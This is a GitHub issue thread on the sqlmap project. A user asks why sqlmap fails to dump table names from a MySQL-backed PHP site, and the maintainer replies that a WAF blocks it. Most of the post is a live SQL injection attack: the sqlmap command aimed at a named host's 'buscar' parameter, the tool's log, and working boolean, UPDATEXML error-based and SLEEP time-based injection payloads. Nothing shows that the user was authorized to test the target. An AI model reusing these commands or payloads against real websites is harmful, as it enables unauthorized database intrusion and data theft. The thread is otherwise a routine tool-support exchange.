sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

Can't retrieve the table names from db #2631

Closed treusfam closed 7 years ago

treusfam commented 7 years ago

Hi all, can someone guide me? I'm getting "[ERROR] unable to retrieve the table names for any database". I'm using:

sqlmap -u host.com/new.php?buscar=vln --threads 10 --time-sec 15 --random-agent -D database --tables

I was able to use --dbs and got the correct database, but I can't get the table names.

[*] starting at 03:29:07

[03:29:07] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X; it-it) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6'
[03:29:07] [INFO] resuming back-end DBMS 'mysql'
[03:29:07] [INFO] testing connection to the target URL
[03:29:11] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:

Parameter buscar (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: buscar=vln%' AND 2206=2206 AND '%'='

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
Payload: f_buscar=eo%' AND UPDATEXML(7518,CONCAT('.','qzzkq',(SELECT (ELT(7518=7518,1))),'qkpqq'),3365) AND '%'='

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: f_buscar=eo%' AND SLEEP(15) AND '%'='

[03:29:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.31, Apache 2.4.26
back-end DBMS: MySQL >= 5.1
[03:29:11] [INFO] fetching tables for database: 'database'
[03:29:12] [WARNING] reflective value(s) found and filtering out
[03:29:12] [WARNING] the SQL query provided does not return any output
[03:29:12] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[03:29:12] [INFO] fetching number of tables for database 'database'
[03:29:12] [INFO] retrieved:
[03:29:13] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[03:29:13] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[03:29:22] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[03:29:22] [WARNING] unable to retrieve the number of tables for database 'database'
[03:29:22] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q]
No tables found
shutting down

I tried it with --flush-session just because I read it in another issue here, but it has the same result.

stamparm commented 7 years ago

You have a protection there. You should manually assess it. This is not an issue of sqlmap.